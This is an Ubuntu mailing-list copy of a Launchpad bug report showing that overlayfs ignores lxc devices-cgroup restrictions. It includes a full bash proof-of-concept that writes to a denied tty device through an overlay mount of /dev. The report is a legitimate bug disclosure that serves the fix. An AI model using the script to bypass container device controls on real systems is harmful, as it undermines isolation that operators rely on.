[Bug 915941] [NEW] overlayfs does not honor lxc-related permissions

Gary Poster gary.poster at canonical.com
Fri Jan 13 11:05:49 UTC 2012 

Public bug reported:

Using overlayfs with lxc causes tty problems that can kill X.  Overlayfs
needs to honor the necessary cgroup permission calls, per the following
information from Serge.

"""
here is a script which you can use to test the overlayfs
issue:

========================= exploit-overlayfs-devices.sh =======================
#!/bin/bash

ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5 }'`
if [ "x$ddir" = "x" ]; then
	echo "couldn't find devices cgroup mountpoint"
	exit 1
fi

# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`

# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`

# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`

mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"

# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"

# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"

umount $odir
rmdir $odir
rm -rf $udir

# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
========================= exploit-overlayfs-devices.sh =======================

The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.

fs/overlayfs/inode.c calls generic_permission, but it needs to do more
of what fs/namei.c:inode_permission() does, in particular the calls to
devcgroup_inode_permission() and security_inode_permission().
"""

[This blocks resolution of bug 914169]

** Affects: launchpad
     Importance: High
         Status: Triaged

** Affects: lxc (Ubuntu)
     Importance: Undecided
         Status: New


** Tags: paralleltest

** Also affects: launchpad
   Importance: Undecided
       Status: New

** Changed in: launchpad
       Status: New => Triaged

** Changed in: launchpad
   Importance: Undecided => High

-- 
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/915941

Title:
  overlayfs does not honor lxc-related permissions

To manage notifications about this bug go to:
https://bugs.launchpad.net/launchpad/+bug/915941/+subscriptions

More information about the Ubuntu-server-bugs mailing list